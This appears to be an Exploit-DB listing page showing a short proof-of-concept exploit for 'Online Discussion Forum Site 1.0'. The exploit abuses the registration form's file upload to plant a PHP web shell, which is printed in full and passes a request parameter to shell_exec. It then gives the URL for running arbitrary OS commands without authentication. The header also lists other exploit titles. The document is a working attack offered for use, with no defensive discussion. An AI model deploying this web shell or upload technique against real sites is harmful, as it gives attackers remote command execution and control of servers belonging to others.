4fbd3630c8
6 changes to exploits/shellcodes GoldWave - Buffer Overflow (SEH Unicode) Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit) Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit) Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated) Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting Online Discussion Forum Site 1.0 - Remote Code Execution
21 lines
No EOL
982 B
Text
21 lines
No EOL
982 B
Text
# Exploit Title: Online Discussion Forum Site 1.0 - Remote Code Execution
|
|
# Google Dork: N/A
|
|
# Date: 2020-05-24
|
|
# Exploit Author: Selim Enes 'Enesdex' Karaduman
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html
|
|
# Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site
|
|
# Version: 1.0 (REQUIRED)
|
|
# Tested on: Windows 10 / Wamp Server
|
|
# CVE : N/A
|
|
Go to http://localhost/Online%20Discussion%20Forum%20Site/register.php register page to sign up
|
|
Then fill other fields and upload the shell.php with following PHP-shell-code
|
|
|
|
<?php
|
|
$command = shell_exec($_REQUEST['cmd']);
|
|
echo $command;
|
|
?>
|
|
|
|
After the registration process is completed go to the following page and execute the os command via uploaded shell
|
|
http://localhost/Online%20Discussion%20Forum%20Site/ups/shell.php?cmd=$THECODE-YOU-WANT-TO-EXECUTE
|
|
|
|
Any unauthenticated attacker is able to execute arbitrary os command |